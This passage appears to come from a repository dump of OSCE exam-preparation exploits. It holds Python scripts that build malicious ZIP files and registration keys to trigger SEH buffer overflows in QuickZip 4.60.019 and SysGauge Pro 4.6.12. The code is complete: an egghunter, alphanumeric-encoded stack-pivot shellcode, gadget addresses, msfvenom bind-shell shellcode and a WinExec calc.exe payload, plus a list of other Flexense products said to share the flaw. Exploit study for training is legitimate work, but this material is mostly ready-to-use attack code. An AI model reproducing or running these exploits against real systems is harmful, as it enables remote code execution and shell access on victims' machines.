0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nCDFileHeader    += '\\xce\\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # CRC-32\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # compressed size\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nCDFileHeader    += '\\xe4\\x0f'         # file name length 0x0fe4 = 4068 bytes\r\nCDFileHeader    += '\\x00\\x00'         # extra field length\r\nCDFileHeader    += '\\x00\\x00'         # file comment length \r\nCDFileHeader    += '\\x00\\x00'         # disk number where file starts\r\nCDFileHeader    += '\\x01\\x00'         # internal file attributes BIT 0: apparent ASCII/text file\r\nCDFileHeader    += '\\x24\\x00\\x00\\x00' # external file attributes \r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # relative offset of local file header\r\n#CDFileHeader    += '\\x00'             # file name\r\n#CDFileHeader    += '\\x00'             # extra field \r\n#CDFileHeader    += '\\x00'             # file comment \r\n################ End of Central 
Directory Record ##################\r\nEOCDRHeader      = '\\x50\\x4b\\x05\\x06' # End of central directory signature\r\nEOCDRHeader     += '\\x00\\x00'         # number of this disk \r\nEOCDRHeader     += '\\x00\\x00'         # disk where central directory starts \r\nEOCDRHeader     += '\\x01\\x00'         # number of central directory records on this disk \r\nEOCDRHeader     += '\\x01\\x00'         # total number of central directory records \r\nEOCDRHeader     += '\\x12\\x10\\x00\\x00' # size of central directory (4114 bytes)\r\nEOCDRHeader     += '\\x02\\x10\\x00\\x00' # offset of start of central directory, relative to start of archive \r\nEOCDRHeader     += '\\x00\\x00'         # comment length \r\n#EOCDRHeader     += '\\x00'             # comment \r\n\r\n#root@kali:~# msfvenom -a x86 --platform windows -e x86/alpha_mixed BufferRegister=EAX -b '\\x00' < /opt/OSCE/Tools/EggHunter.bin \r\n#Payload size: 118 bytes\r\nEggHunter = 'PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJISVoqkzYovoPBCbbJDBqHzm6NuldECj3DhoLxBtdpfPaGNkijLoT5kZlobUywkOxgAA'\r\n\r\nEvil  = '\\x41' * 10                   # filler to egghunter  \r\nEvil += EggHunter                     # hunt baby hunt!\r\nEvil += '\\x42' * 47                   # filler to the start of hand crafted shellcode\r\nEvil += '\\x54'                        # PUSH ESP                * save stack pointer \r\nEvil += '\\x5F'                        # POP EDI                 * point eax to where we want to decode otherwise bad shellcode \r\nEvil += '\\x54'                        # push   esp\r\nEvil += '\\x58'                        # pop    eax\r\nEvil += '\\x05\\x21\\x13\\x11\\x11'        # add    eax,0x11111321\r\nEvil += '\\x05\\x21\\x16\\x11\\x11'        # add    eax,0x11111621\r\nEvil += '\\x2d\\x06\\x23\\x22\\x22'        # sub    eax,0x22222306 \r\nEvil += '\\x50'                        # PUSH EAX\r\nEvil += '\\x5C'                        # POP ESP                 * move eax value into stack pointer  \r\nEvil += 
'\\x25\\x4A\\x4D\\x4E\\x55'        # AND EAX,554E4D4A        * decode 'mov esp, edi;jmp eax'\r\nEvil += '\\x25\\x35\\x32\\x31\\x2A'        # AND EAX,2A313235\r\nEvil += '\\x05\\x44\\x76\\x77\\x61'        # ADD EAX,61777644\r\nEvil += '\\x05\\x44\\x65\\x66\\x51'        # ADD EAX,51666544\r\nEvil += '\\x05\\x34\\x54\\x55\\x61'        # ADD EAX,61555434\r\nEvil += '\\x2D\\x33\\x33\\x33\\x33'        # SUB EAX,33333333\r\nEvil += '\\x50'                        # PUSH EAX\r\nEvil += '\\x25\\x4A\\x4D\\x4E\\x55'        # AND EAX,554E4D4A        * point eax to egg hunter shellcode \r\nEvil += '\\x25\\x35\\x32\\x31\\x2A'        # AND EAX,2A313235\r\nEvil += '\\x05\\x71\\x75\\x11\\x11'        # ADD EAX,11117571\r\nEvil += '\\x05\\x71\\x75\\x11\\x11'        # ADD EAX,11117571\r\nEvil += '\\x05\\x11\\x35\\x11\\x11'        # ADD EAX,11113511\r\nEvil += '\\x2D\\x13\\x25\\x21\\x33'        # SUB EAX,33212513\r\nEvil += '\\x41' * (294-10-len(EggHunter)-47-82)\r\nEvil += '\\x75\\x9f\\x74\\x9f'            # nSEH JZ & JNZ (aka jump net)\r\nEvil += '\\x41\\x16\\x40\\x00'            # SEH pop esi,pop ebx, retn in QuickZip.exe \r\nEvil += shellcode                     # egg + shellcode     \r\nEvil += '\\x41' * (4064-294-4-4-len(shellcode))\r\nEvil += '.txt'\r\n\r\nbuffer  = LocalFileHeader\r\nbuffer += Evil\r\nbuffer += CDFileHeader\r\nbuffer += Evil\r\nbuffer += EOCDRHeader  \r\n\r\ntry:\r\n\tf=open(\"Evil.zip\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(Evil)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e"
  },
  {
    "path": "Local Buffer Overflow/QuickZipv4.60.019/OS Dependent/Exploit.py",
    "content": "#!/usr/bin/python\r\n\r\n# root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode \r\n# Payload size: 710 bytes\r\nshellcode =  \"\"\r\nshellcode += \"\\x50\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\nshellcode += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\r\nshellcode += \"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\r\nshellcode += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\r\nshellcode += \"\\x42\\x75\\x4a\\x49\\x69\\x6c\\x69\\x78\\x4c\\x42\\x73\\x30\"\r\nshellcode += \"\\x37\\x70\\x57\\x70\\x55\\x30\\x6f\\x79\\x49\\x75\\x74\\x71\"\r\nshellcode += \"\\x39\\x50\\x72\\x44\\x4e\\x6b\\x76\\x30\\x64\\x70\\x6e\\x6b\"\r\nshellcode += \"\\x62\\x72\\x36\\x6c\\x4e\\x6b\\x76\\x32\\x34\\x54\\x6e\\x6b\"\r\nshellcode += \"\\x44\\x32\\x74\\x68\\x66\\x6f\\x68\\x37\\x32\\x6a\\x37\\x56\"\r\nshellcode += \"\\x35\\x61\\x6b\\x4f\\x4e\\x4c\\x65\\x6c\\x45\\x31\\x31\\x6c\"\r\nshellcode += \"\\x43\\x32\\x64\\x6c\\x75\\x70\\x79\\x51\\x4a\\x6f\\x66\\x6d\"\r\nshellcode += \"\\x76\\x61\\x6b\\x77\\x4d\\x32\\x7a\\x52\\x43\\x62\\x73\\x67\"\r\nshellcode += \"\\x6e\\x6b\\x61\\x42\\x34\\x50\\x6e\\x6b\\x42\\x6a\\x75\\x6c\"\r\nshellcode += \"\\x4c\\x4b\\x42\\x6c\\x57\\x61\\x63\\x48\\x6a\\x43\\x57\\x38\"\r\nshellcode += \"\\x73\\x31\\x58\\x51\\x73\\x61\\x4c\\x4b\\x66\\x39\\x47\\x50\"\r\nshellcode += \"\\x75\\x51\\x4e\\x33\\x6e\\x6b\\x37\\x39\\x32\\x38\\x49\\x73\"\r\nshellcode += \"\\x74\\x7a\\x67\\x39\\x4e\\x6b\\x50\\x34\\x4e\\x6b\\x35\\x51\"\r\nshellcode += \"\\x6e\\x36\\x56\\x51\\x39\\x6f\\x6c\\x6c\\x79\\x51\\x38\\x4f\"\r\nshellcode += \"\\x74\\x4d\\x57\\x71\\x39\\x57\\x56\\x58\\x79\\x70\\x31\\x65\"\r\nshellcode += \"\\x49\\x66\\x44\\x43\\x61\\x6d\\x4c\\x38\\x45\\x6b\\x63\\x4d\"\r\nshellcode += \"\\x45\\x74\\x72\\x55\\x7a\\x44\\x62\\x78\\x6e\\x6b\\x76\\x38\"\r\nshellcode += 
\"\\x47\\x54\\x76\\x61\\x59\\x43\\x70\\x66\\x4e\\x6b\\x36\\x6c\"\r\nshellcode += \"\\x70\\x4b\\x4e\\x6b\\x71\\x48\\x75\\x4c\\x76\\x61\\x4e\\x33\"\r\nshellcode += \"\\x6c\\x4b\\x56\\x64\\x6e\\x6b\\x46\\x61\\x7a\\x70\\x6b\\x39\"\r\nshellcode += \"\\x71\\x54\\x45\\x74\\x57\\x54\\x43\\x6b\\x33\\x6b\\x75\\x31\"\r\nshellcode += \"\\x30\\x59\\x61\\x4a\\x30\\x51\\x79\\x6f\\x39\\x70\\x63\\x6f\"\r\nshellcode += \"\\x43\\x6f\\x30\\x5a\\x6c\\x4b\\x52\\x32\\x48\\x6b\\x6c\\x4d\"\r\nshellcode += \"\\x43\\x6d\\x30\\x68\\x67\\x43\\x47\\x42\\x35\\x50\\x77\\x70\"\r\nshellcode += \"\\x53\\x58\\x34\\x37\\x32\\x53\\x64\\x72\\x43\\x6f\\x46\\x34\"\r\nshellcode += \"\\x31\\x78\\x72\\x6c\\x44\\x37\\x65\\x76\\x63\\x37\\x69\\x6f\"\r\nshellcode += \"\\x6e\\x35\\x4c\\x78\\x6e\\x70\\x53\\x31\\x57\\x70\\x65\\x50\"\r\nshellcode += \"\\x47\\x59\\x6a\\x64\\x71\\x44\\x42\\x70\\x70\\x68\\x44\\x69\"\r\nshellcode += \"\\x6b\\x30\\x42\\x4b\\x67\\x70\\x4b\\x4f\\x38\\x55\\x33\\x5a\"\r\nshellcode += \"\\x57\\x78\\x62\\x79\\x32\\x70\\x38\\x62\\x4b\\x4d\\x47\\x30\"\r\nshellcode += \"\\x36\\x30\\x73\\x70\\x50\\x50\\x62\\x48\\x7a\\x4a\\x74\\x4f\"\r\nshellcode += \"\\x6b\\x6f\\x39\\x70\\x69\\x6f\\x78\\x55\\x6a\\x37\\x32\\x48\"\r\nshellcode += \"\\x66\\x62\\x73\\x30\\x34\\x51\\x51\\x4c\\x4c\\x49\\x5a\\x46\"\r\nshellcode += \"\\x31\\x7a\\x42\\x30\\x31\\x46\\x66\\x37\\x55\\x38\\x68\\x42\"\r\nshellcode += \"\\x39\\x4b\\x44\\x77\\x51\\x77\\x49\\x6f\\x4a\\x75\\x32\\x77\"\r\nshellcode += \"\\x51\\x78\\x38\\x37\\x6a\\x49\\x75\\x68\\x69\\x6f\\x49\\x6f\"\r\nshellcode += \"\\x6a\\x75\\x70\\x57\\x71\\x78\\x43\\x44\\x68\\x6c\\x67\\x4b\"\r\nshellcode += \"\\x49\\x71\\x69\\x6f\\x69\\x45\\x51\\x47\\x6c\\x57\\x31\\x78\"\r\nshellcode += \"\\x54\\x35\\x42\\x4e\\x72\\x6d\\x71\\x71\\x59\\x6f\\x39\\x45\"\r\nshellcode += \"\\x45\\x38\\x33\\x53\\x72\\x4d\\x53\\x54\\x55\\x50\\x4c\\x49\"\r\nshellcode += \"\\x6b\\x53\\x42\\x77\\x51\\x47\\x76\\x37\\x70\\x31\\x79\\x66\"\r\nshellcode += 
\"\\x53\\x5a\\x32\\x32\\x73\\x69\\x66\\x36\\x49\\x72\\x39\\x6d\"\r\nshellcode += \"\\x70\\x66\\x48\\x47\\x51\\x54\\x47\\x54\\x35\\x6c\\x35\\x51\"\r\nshellcode += \"\\x56\\x61\\x6c\\x4d\\x47\\x34\\x34\\x64\\x32\\x30\\x7a\\x66\"\r\nshellcode += \"\\x35\\x50\\x43\\x74\\x73\\x64\\x46\\x30\\x70\\x56\\x50\\x56\"\r\nshellcode += \"\\x32\\x76\\x43\\x76\\x33\\x66\\x50\\x4e\\x62\\x76\\x43\\x66\"\r\nshellcode += \"\\x73\\x63\\x32\\x76\\x70\\x68\\x62\\x59\\x58\\x4c\\x47\\x4f\"\r\nshellcode += \"\\x6b\\x36\\x39\\x6f\\x4a\\x75\\x6c\\x49\\x69\\x70\\x72\\x6e\"\r\nshellcode += \"\\x52\\x76\\x33\\x76\\x39\\x6f\\x76\\x50\\x52\\x48\\x46\\x68\"\r\nshellcode += \"\\x6e\\x67\\x47\\x6d\\x33\\x50\\x79\\x6f\\x79\\x45\\x6f\\x4b\"\r\nshellcode += \"\\x78\\x70\\x6e\\x55\\x79\\x32\\x56\\x36\\x73\\x58\\x6e\\x46\"\r\nshellcode += \"\\x6a\\x35\\x4f\\x4d\\x4d\\x4d\\x59\\x6f\\x39\\x45\\x65\\x6c\"\r\nshellcode += \"\\x77\\x76\\x61\\x6c\\x47\\x7a\\x4f\\x70\\x79\\x6b\\x69\\x70\"\r\nshellcode += \"\\x62\\x55\\x54\\x45\\x6f\\x4b\\x51\\x57\\x56\\x73\\x64\\x32\"\r\nshellcode += \"\\x62\\x4f\\x52\\x4a\\x37\\x70\\x43\\x63\\x4b\\x4f\\x49\\x45\"\r\nshellcode += \"\\x41\\x41\"\r\n\r\n####################### ZIP File Structure ######################## \r\n###################################################################\r\n######################## Local File Header ########################\r\nLocalFileHeader  = '\\x50\\x4b\\x03\\x04' # local file header signature\r\nLocalFileHeader += '\\x14\\x00'         # version needed to extract 0x14 = 20 -> 2.0\r\nLocalFileHeader += '\\x00\\x00'         # general purpose bit flag\r\nLocalFileHeader += '\\x00\\x00'         # compression method\r\nLocalFileHeader += '\\xb7\\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nLocalFileHeader += '\\xce\\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nLocalFileHeader += '\\x00\\x00\\x00'     # CRC-32 '\\x00' was left out to make sure we hit 25 bytes before file 
length\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nLocalFileHeader += '\\xe4\\x0f'         # file name length 0x0fe4 = 4068 bytes \r\nLocalFileHeader += '\\x00\\x00'         # extra field length\r\nLocalFileHeader += '\\x00'             # file name\r\n#LocalFileHeader += '\\x00'             # extra filed \r\n################## Central Directory File Header ##################\r\nCDFileHeader     = '\\x50\\x4b\\x01\\x02' # cd file header signature \r\nCDFileHeader    += '\\x14\\x00'         # version made by 0x14 = 20 -> 2.0\r\nCDFileHeader    += '\\x14\\x00'         # version needed to extract 0x14 = 20 -> 2.0\r\nCDFileHeader    += '\\x00\\x00'         # general purpose bit flag\r\nCDFileHeader    += '\\x00\\x00'         # compression method \r\nCDFileHeader    += '\\xb7\\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nCDFileHeader    += '\\xce\\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # CRC-32\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # compressed size\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nCDFileHeader    += '\\xe4\\x0f'         # file name length 0x0fe4 = 4068 bytes\r\nCDFileHeader    += '\\x00\\x00'         # extra field length\r\nCDFileHeader    += '\\x00\\x00'         # file comment length \r\nCDFileHeader    += '\\x00\\x00'         # disk number where file starts\r\nCDFileHeader    += '\\x01\\x00'         # internal file attributes BIT 0: apparent ASCII/text file\r\nCDFileHeader    += '\\x24\\x00\\x00\\x00' # external file attributes \r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # relative offset of local file header\r\n#CDFileHeader    += '\\x00'             # file name\r\n#CDFileHeader    += '\\x00'             # extra field \r\n#CDFileHeader    += '\\x00'             # file comment \r\n################ End of Central 
Directory Record ##################\r\nEOCDRHeader      = '\\x50\\x4b\\x05\\x06' # End of central directory signature\r\nEOCDRHeader     += '\\x00\\x00'         # number of this disk \r\nEOCDRHeader     += '\\x00\\x00'         # disk where central directory starts \r\nEOCDRHeader     += '\\x01\\x00'         # number of central directory records on this disk \r\nEOCDRHeader     += '\\x01\\x00'         # total number of central directory records \r\nEOCDRHeader     += '\\x12\\x10\\x00\\x00' # size of central directory (4114 bytes)\r\nEOCDRHeader     += '\\x02\\x10\\x00\\x00' # offset of start of central directory, relative to start of archive \r\nEOCDRHeader     += '\\x00\\x00'         # comment length \r\n#EOCDRHeader     += '\\x00'             # comment \r\n\r\nEvil  = '\\x41' * 294\r\nEvil += '\\x75\\x06\\x74\\x06'            # nSEH JZ & JNZ (aka jump net)\r\nEvil += '\\x3d\\x1b\\x7e\\x6d'            # SEH pop esi,pop ebx, retn in D3DXOF.dll (OS module - WinXP SP3)\r\nEvil += '\\x41\\x41'                    # compensate for short jump\r\nEvil += '\\x54'                        # PUSH ESP                  * save stack pointer to edi \r\nEvil += '\\x5F'                        # POP EDI\r\nEvil += '\\x54'                        # PUSH ESP                  * point esp to where we want to decode otherwise bad shellcode\r\nEvil += '\\x58'                        # POP EAX\r\nEvil += '\\x05\\x24\\x13\\x11\\x11'        # ADD EAX,11111324\r\nEvil += '\\x05\\x25\\x16\\x11\\x11'        # ADD EAX,11111625\r\nEvil += '\\x2D\\x21\\x22\\x22\\x22'        # SUB EAX,22222221\r\nEvil += '\\x50'                        # PUSH EAX\r\nEvil += '\\x5C'                        # POP ESP                   * mov eax to esp\r\n#root@kali:/opt/Slink# python Slink.py                            * decode the following \r\n#Enter your shellcode: 89FC89F8054E070000FFE0                       mov    esp,edi           restore stack pointer \r\n#[!] 
Shellcode size is not divisible by 4                           mov    eax,edi           use edi as an relative address \r\n#[+] Padding shellcode with 1 NOPS..                                add    eax,0x74e         align eax to the start oh shellcode \r\n#[+] Encoding [90e0ff00]..                                          jmp    eax               jump to shellcode \r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nEvil += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and  eax, 0x554e4d4a\r\nEvil += \"\\x25\\x35\\x32\\x31\\x2A\" ## and  eax, 0x2a313235\r\nEvil += \"\\x05\\x11\\x77\\x61\\x41\" ## add  eax, 0x41617711\r\nEvil += \"\\x05\\x11\\x66\\x51\\x41\" ## add  eax, 0x41516611\r\nEvil += \"\\x05\\x11\\x55\\x61\\x41\" ## add  eax, 0x41615511\r\nEvil += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub  eax, 0x33333333\r\nEvil += \"\\x50\"                 ## push eax\r\n#[+] Encoding [00074e05]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nEvil += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and  eax, 0x554e4d4a\r\nEvil += \"\\x25\\x35\\x32\\x31\\x2A\" ## and  eax, 0x2a313235\r\nEvil += \"\\x05\\x13\\x36\\x13\\x11\" ## add  eax, 0x11133613\r\nEvil += \"\\x05\\x13\\x25\\x13\\x11\" ## add  eax, 0x11132513\r\nEvil += \"\\x05\\x12\\x26\\x13\\x11\" ## add  eax, 0x11132612\r\nEvil += \"\\x2D\\x33\\x33\\x32\\x33\" ## sub  eax, 0x33323333\r\nEvil += \"\\x50\"                 ## push eax\r\n#[+] Encoding [f889fc89]..\r\n#[!] 
[01] and/or [f] and/or [00] found, using alterantive encoder..\r\nEvil += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and  eax, 0x554e4d4a\r\nEvil += \"\\x25\\x35\\x32\\x31\\x2A\" ## and  eax, 0x2a313235\r\nEvil += \"\\x05\\x44\\x76\\x44\\x74\" ## add  eax, 0x74447644\r\nEvil += \"\\x05\\x44\\x65\\x44\\x64\" ## add  eax, 0x64446544\r\nEvil += \"\\x05\\x34\\x54\\x34\\x53\" ## add  eax, 0x53345434\r\nEvil += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub  eax, 0x33333333\r\nEvil += \"\\x50\"                 ## push eax\r\nEvil += '\\x42' * (250-116)\r\nEvil += shellcode \r\nEvil += '\\x41' * (4064-294-4-4-250-len(shellcode))\r\nEvil += '.txt'\r\n\r\nbuffer  = LocalFileHeader\r\nbuffer += Evil\r\nbuffer += CDFileHeader\r\nbuffer += Evil\r\nbuffer += EOCDRHeader  \r\n\r\ntry:\r\n\tf=open(\"Evil.zip\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(Evil)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e"
  },
  {
    "path": "Local Buffer Overflow/QuickZipv4.60.019/README.md",
    "content": "### Quick Zip v4.60.019\nLocal SEH overwrite with a restricted character set. I thought this exploit was quite challenging yet fun!\n\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/QuickZipv4.60.019/PoC.gif\">\n</p>\n"
  },
  {
    "path": "Local Buffer Overflow/SysGaugeProv4.6.12/Exploit.py",
    "content": "#!/usr/bin/python\n##################################################################################################################\n# Exploit Title       : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH)                                       #\n# Exploit Author      : Hashim Jawad                                                                             #\n# Twitter             : @ihack4falafel                                                                           #\n# Author Website      : ihack4falafel[.]com                                                                      #\n# Vendor Homepage     : http://www.sysgauge.com/                                                                 #\n# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe                             #\n# Tested on           : Windows XP Professional - SP3                                                            #\n# Steps to reproduce  : ~ Copy content of payload.txt                                                            #\n#                       ~ Under Register type in \"falafel\" in Customer Name field                                #\n#                       ~ Paste the content of payload.txt in Unlock Key field and click Register                #\n##################################################################################################################\n\nimport struct\n\n# ***notes***\n# ~ this particular function [Register] of the program only accept characters [00-7f] excluding \"\\x00\\x09\\x0a\\x0d\"\n# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address\n# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)\n##################################################################################################################\n#   ~ SysGauge Ultimate v4.6.12\n#   ~ Azure DEX Pro v2.2.16\n#   ~ 
Azure DEX Ultimate v2.2.16\n#   ~ DiskBoss Pro v9.1.16\n#   ~ DiskBoss Ultimate v9.1.16\n#   ~ SyncBreeze Pro v10.7.14\n#   ~ SyncBreeze Ultimate v10.7.14\n#   ~ DiskPulse Pro v10.7.14\n#   ~ DiskPulse Ultimate v10.7.14\n#   ~ DiskSavvy Pro v10.7.14\n#   ~ DiskSavvy Ultimate v10.7.14\n#   ~ DiskSorter Pro v10.7.14\n#   ~ DiskSorter Ultimate v10.7.14\n#   ~ DupScout Pro v10.7.14\n#   ~ DupScout Ultimate v10.7.14\n#   ~ VX Search Pro v10.7.14\n#   ~ VX Search Ultimate v10.7.14\n##################################################################################################################\n\n# overwrite SEH with clean address of [pop, pop, ret]\nbuffer  = \"\\x41\" * 780                                  # junk to nSEH\nbuffer += \"\\x74\\x06\\x42\\x42\"                            # nSEH - jump if zero flag is set (always true)\nbuffer += struct.pack('<L', 0x10013d16)                 # SEH (pop esi # pop ecx # retn  | [libdgg.dll])\nbuffer += \"\\x43\" * 28                                   # some more junk\n\n# push calc.exe instructions [encoded] into the stack \n# Disassembly:\n# 0:  33 c0                   xor    eax,eax           # zero out eax register\n# 2:  50                      push   eax               # push eax (null-byte) to terminate \"calc.exe\"\n# 3:  68 2E 65 78 65          push   \".exe\"            # push the ASCII string to the stack\n# 8:  68 63 61 6C 63          push   \"calc\"            # \n# d:  8b c4                   mov    eax,esp           # put the pointer to the ASCII string in eax\n# f:  6a 01                   push   0x1               # push uCmdShow parameter to the stack\n# 11: 50                      push   eax               # push the pointer to lpCmdLine to the stack\n# 12: bb 5d 2b 86 7c          mov    ebx,0x7c862b5d    # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx\n# 17: ff d3                   call   ebx               # call WinExec()\n\n# divide calc.exe 
instructions to 4-byte chunks and pad what's left with nops\n# \"\\x33\\xc0\\x50\\x68\"\n# \"\\x2e\\x65\\x78\\x65\"\n# \"\\x68\\x63\\x61\\x6C\"\n# \"\\x63\\x8b\\xc4\\x6a\"\n# \"\\x01\\x50\\xbb\\x5d\"\n# \"\\x2b\\x86\\x7c\\xff\"\n# \"\\xd3\\x90\\x90\\x90\"\n\n# starting from the bottom up in little endian order\n# first   push \"\\x90\\x90\\x90\\xd3\"\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\x90\\x90\\x90\\xd3\" into eax and push it to the stack\nbuffer += \"\\x05\\x72\\x70\\x70\\x70\"       ### add eax,0x70707072\nbuffer += \"\\x05\\x61\\x20\\x20\\x20\"       ### add eax,0x20202061\nbuffer += \"\\x50\"                       ### push eax \n##############################################################\n\n# second  push \"\\xff\\x7c\\x86\\x2b\"\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\xff\\x7c\\x86\\x2b\" into eax and push it to the stack\nbuffer += \"\\x05\\x01\\x32\\x35\\x66\"       ### add eax,0x66353201\nbuffer += \"\\x05\\x15\\x32\\x35\\x66\"       ### add eax,0x66353215\nbuffer += \"\\x05\\x15\\x22\\x12\\x33\"       ### add eax,0x33122215\nbuffer += \"\\x50\"                       ### push eax \n##############################################################\n\n# third   push \"\\x5d\\xbb\\x50\\x01\"\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\x5d\\xbb\\x50\\x01\" into eax and push it to the stack \nbuffer += \"\\x05\\x01\\x30\\x65\\x36\"       ### add eax,0x36653001\nbuffer += 
\"\\x05\\x01\\x20\\x56\\x27\"       ### add eax,0x27562001\nbuffer += \"\\x48\"                       ### dec eax\nbuffer += \"\\x50\"                       ### push eax \n##############################################################\n\n# fourth  push \"\\x6a\\xc4\\x8b\\x63\"\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\x6a\\xc4\\x8b\\x63\" into eax and push it to the stack \nbuffer += \"\\x05\\x32\\x46\\x70\\x35\"       ### add eax,0x35544632\nbuffer += \"\\x05\\x31\\x43\\x70\\x35\"       ### add eax,0x35704531\nbuffer += \"\\x50\"                       ### push eax \n##############################################################\n\n# fifth   push \"\\x6c\\x61\\x63\\x68\"\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\x6c\\x61\\x63\\x68\" into eax and push it to the stack\nbuffer += \"\\x05\\x34\\x32\\x31\\x36\"       ### add eax,0x36313234\nbuffer += \"\\x05\\x34\\x31\\x30\\x36\"       ### add eax,0x36303134\nbuffer += \"\\x50\"                       ### push eax \n##############################################################\n\n# sixth   push \"\\x65\\x78\\x65\\x2e\"\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\x65\\x78\\x65\\x2e\" into eax and push it to the stack \nbuffer += \"\\x05\\x17\\x33\\x34\\x33\"       ### add eax,0x33343317\nbuffer += \"\\x05\\x17\\x32\\x44\\x32\"       ### add eax,0x32443217\nbuffer += \"\\x50\"                       ### push eax 
\n##############################################################\n\n# seventh push \"\\x68\\x50\\xc0\\x33\"\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\x68\\x50\\xc0\\x33\" into eax and push it to the stack \nbuffer += \"\\x05\\x22\\x60\\x30\\x34\"       ### add eax,0x34306022\nbuffer += \"\\x05\\x11\\x60\\x20\\x34\"       ### add eax,0x34206011\nbuffer += \"\\x50\"                       ### push   eax \n##############################################################\n\n# push 20 nops to the stack for padding\n##############################################################\n# zero out eax\nbuffer += \"\\x25\\x10\\x10\\x10\\x10\"       ### and eax, 0x10101010\nbuffer += \"\\x25\\x01\\x01\\x01\\x01\"       ### and eax, 0x01010101\n\n# move \"\\x90\\x90\\x90\\x90\" into eax and push it to the stack \nbuffer += \"\\x05\\x70\\x70\\x70\\x70\"       ### add eax,0x70707070\nbuffer += \"\\x05\\x20\\x20\\x20\\x20\"       ### add eax,0x20202020\nbuffer += \"\\x50\"                       ### push eax\nbuffer += \"\\x50\"                       ### push eax\nbuffer += \"\\x50\"                       ### push eax\nbuffer += \"\\x50\"                       ### push eax\nbuffer += \"\\x50\"                       ### push eax\n##############################################################\n\n# push \"jmp esp\" address [encoded] to the stack \n# 0x6709e053 : \"\\xff\\xe4\" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\\Program Files\\SysGauge Pro\\bin\\QtCore4.dll)\n# 0:  25 10 10 10 10          and    eax,0x10101010\n# 5:  25 01 01 01 01          and    eax,0x1010101\n# a:  05 31 70 03 34          add    eax,0x34037031\n# f:  05 22 70 06 33          add    eax,0x33067022\n# 14: 50                      push   eax \n\nbuffer += 
